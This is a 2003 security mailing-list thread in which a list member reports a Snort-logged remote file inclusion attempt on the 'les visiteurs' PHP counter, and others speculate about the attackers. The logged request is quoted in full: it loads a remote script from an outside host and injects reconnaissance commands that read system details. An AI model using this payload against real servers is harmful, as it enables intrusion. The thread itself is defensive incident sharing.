Hi Daniel , They are kiddies... :( I was looking the files and there are only high-risk-rated exploits downloaded from packet storm , ptrace , etc . And they are running remote php shells in their server.... xD
See you in the IRC tonight ? Best regards, ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->\x74\x72\x75\x6c\x75\x78 0x02->The truth is out there, 0x03-> outside your mind . __________________________________ PGP: Keyfingerprint 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B ID: 0x91805F5B ********************************** \x6e\x73\x72\x67 \x73\x65\x63\x75\x72\x69\x74\x79 \x72\x65\x73\x65\x61\x72\x63\x68 http://www.nsrg-security.com ______________________ ----- Original Message ----- From: "Dan" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, December 01, 2003 6:02 PM Subject: Re: [Full-Disclosure] file inclusion (les visiteurs) > This is the same set of files that I noticed last week(xfteam.net) it seems > they closed their domain down? (I cannot find it) > Does anyone know if these ppl are a real sec organisation? or just some > kiddies ? > > Cheers, > Daniel. > > "Evert Daman" <[EMAIL PROTECTED]> wrote: > > > > > last night snort detected this request: > > > > GET > > > /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid. org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls > > > > > > because i patched 'les visiteurs' as described by 'matthieu peschaud' > > on bugtraq on the 26 of october nothing happend, but it looks like someone > > is trying to exploit this bug. > > just want to mention it to this wonderfull list :) > > > > kind regards, > > Evert > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
